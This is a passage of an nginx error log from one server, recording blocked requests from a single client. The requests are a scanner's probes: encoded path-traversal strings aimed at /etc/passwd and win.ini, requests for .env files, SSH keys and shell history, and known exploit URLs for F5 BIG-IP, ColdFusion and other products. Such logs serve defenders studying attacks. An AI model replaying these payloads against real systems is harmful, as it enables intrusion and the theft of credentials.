2791659#2791659: *2058871 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:21 [error] 2791659#2791659: *2058877 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:23 [error] 2791659#2791659: *2058889 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:34 [error] 2791659#2791659: *2058949 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:46 [error] 2791659#2791659: *2059016 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:49 [error] 2791659#2791659: *2059041 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:50 [error] 2791659#2791659: *2059052 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:51 [error] 2791659#2791659: *2059057 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:55 [error] 2791659#2791659: *2059079 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:34:00 [error] 2791659#2791659: *2059099 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:34:02 [error] 2791659#2791659: *2059109 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:34:04 [error] 2791659#2791659: *2059118 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 22:05:59 [error] 2791659#2791659: *2268501 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /custom-report-example/..%5C..%5C..%5Cdeployment%5Csharp%5Cicons%5Chome-app.png HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 22:20:46 [error] 2791659#2791659: *2269882 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /custom-report-example/..%5C..%5C..%5Cdeployment%5Csharp%5Cicons%5Chome-app.png HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 22:31:22 [error] 2791659#2791659: *2270487 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 22:40:30 [error] 2791659#2791659: *2271051 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 22:40:57 [error] 2791659#2791659: *2271078 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 22:42:06 [error] 2791659#2791659: *2271135 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 22:43:50 [error] 2791659#2791659: *2271226 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 22:59:22 [error] 2791659#2791659: *2272179 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:00:56 [error] 2791659#2791659: *2272295 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:03:01 [error] 2791659#2791659: *2272453 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:03:33 [error] 2791659#2791659: *2272474 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.magnolia/admincentral HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:09:36 [error] 2791659#2791659: *2272753 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/09/24 23:12:08 [error] 2791659#2791659: *2273010 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:29:40 [error] 2791659#2791659: *2274005 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:32:43 [error] 2791659#2791659: *2274189 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.tugboat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:43:59 [error] 2791659#2791659: *2275032 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:45:07 [error] 2791659#2791659: *2275124 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:46:38 [error] 2791659#2791659: *2275190 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:46:46 [error] 2791659#2791659: *2275196 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:33 [error] 2791659#2791659: *2275381 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:37 [error] 2791659#2791659: *2275382 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:37 [error] 2791659#2791659: *2275383 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:37 [error] 2791659#2791659: *2275384 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:38 [error] 2791659#2791659: *2275385 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:38 [error] 2791659#2791659: *2275386 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:38 [error] 2791659#2791659: *2275387 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:38 [error] 2791659#2791659: *2275388 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:39 [error] 2791659#2791659: *2275389 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:39 [error] 2791659#2791659: *2275390 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:40 [error] 2791659#2791659: *2275393 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:49:47 [error] 2791659#2791659: *2275398 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:53:10 [error] 2791659#2791659: *2275966 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/24 23:57:21 [error] 2791659#2791659: *2276475 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:02:50 [error] 2791659#2791659: *2276832 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:09:26 [error] 2791659#2791659: *2277205 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:09:28 [error] 2791659#2791659: *2277208 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:09:28 [error] 2791659#2791659: *2277210 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:09:29 [error] 2791659#2791659: *2277212 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:09:29 [error] 2791659#2791659: *2277213 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:09:29 [error] 2791659#2791659: *2277214 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:09:33 [error] 2791659#2791659: *2277231 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:14:58 [error] 2791659#2791659: *2277637 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:19:23 [error] 2791659#2791659: *2277934 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.auth.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:35:15 [error] 2791659#2791659: *2278829 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:40:01 [error] 2791659#2791659: *2279148 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/09/25 00:44:13 [error] 2791659#2791659: *2279455 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:45:49 [error] 2791659#2791659: *2279571 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /api/hassio/app/.%09./supervisor/info HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:47:35 [error] 2791659#2791659: *2279736 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:47:35 [error] 2791659#2791659: *2279737 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:47:36 [error] 2791659#2791659: *2279738 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:47:36 [error] 2791659#2791659: *2279739 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:47:36 [error] 2791659#2791659: *2279740 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:47:36 [error] 2791659#2791659: *2279741 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:47:37 [error] 2791659#2791659: *2279742 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:50:21 [error] 2791659#2791659: *2279891 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 00:57:21 [error] 2791659#2791659: *2280248 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:08:12 [error] 2791659#2791659: *2280832 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:08:36 [error] 2791659#2791659: *2280851 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:08:59 [error] 2791659#2791659: *2280886 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:08:59 [error] 2791659#2791659: *2280888 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:00 [error] 2791659#2791659: *2280890 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:00 [error] 2791659#2791659: *2280891 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:00 [error] 2791659#2791659: *2280892 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:00 [error] 2791659#2791659: *2280893 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:01 [error] 2791659#2791659: *2280894 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:01 [error] 2791659#2791659: *2280895 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:01 [error] 2791659#2791659: *2280896 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:01 [error] 2791659#2791659: *2280897 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:02 [error] 2791659#2791659: *2280898 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:02 [error] 2791659#2791659: *2280899 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:02 [error] 2791659#2791659: *2280900 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:02 [error] 2791659#2791659: *2280901 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:03 [error] 2791659#2791659: *2280902 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:03 [error] 2791659#2791659: *2280904 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:03 [error] 2791659#2791659: *2280906 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:03 [error] 2791659#2791659: *2280907 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:04 [error] 2791659#2791659: *2280908 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:09:04 [error] 2791659#2791659: *2280909 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:18 [error] 2791659#2791659: *2280989 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:29 [error] 2791659#2791659: *2280996 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:29 [error] 2791659#2791659: *2280997 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:30 [error] 2791659#2791659: *2280998 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:30 [error] 2791659#2791659: *2280999 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:30 [error] 2791659#2791659: *2281000 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:30 [error] 2791659#2791659: *2281001 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:31 [error] 2791659#2791659: *2281002 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:31 [error] 2791659#2791659: *2281003 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:31 [error] 2791659#2791659: *2281004 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:31 [error] 2791659#2791659: *2281005 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:43 [error] 2791659#2791659: *2281018 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:43 [error] 2791659#2791659: *2281019 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:44 [error] 2791659#2791659: *2281020 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:44 [error] 2791659#2791659: *2281021 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:44 [error] 2791659#2791659: *2281022 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:44 [error] 2791659#2791659: *2281023 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:45 [error] 2791659#2791659: *2281024 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:45 [error] 2791659#2791659: *2281025 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:45 [error] 2791659#2791659: *2281026 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:45 [error] 2791659#2791659: *2281027 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:10:46 [error] 2791659#2791659: *2281028 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:15:53 [error] 2791659#2791659: *2281352 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.clean.sh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:17:34 [error] 2791659#2791659: *2281462 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:19:12 [error] 2791659#2791659: *2281533 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:20:41 [error] 2791659#2791659: *2281611 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:20:56 [error] 2791659#2791659: *2281621 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:26:53 [error] 2791659#2791659: *2282005 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:32:59 [error] 2791659#2791659: *2282553 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:38:30 [error] 2791659#2791659: *2282828 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:38:33 [error] 2791659#2791659: *2282834 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:40:03 [error] 2791659#2791659: *2282904 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:40:25 [error] 2791659#2791659: *2282912 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/09/25 01:41:42 [error] 2791659#2791659: *2282976 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:52:05 [error] 2791659#2791659: *2283504 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:54:53 [error] 2791659#2791659: *2283697 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.mysql_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:56:08 [error] 2791659#2791659: *2283900 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:23 [error] 2791659#2791659: *2284064 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:23 [error] 2791659#2791659: *2284065 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:23 [error] 2791659#2791659: *2284066 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd 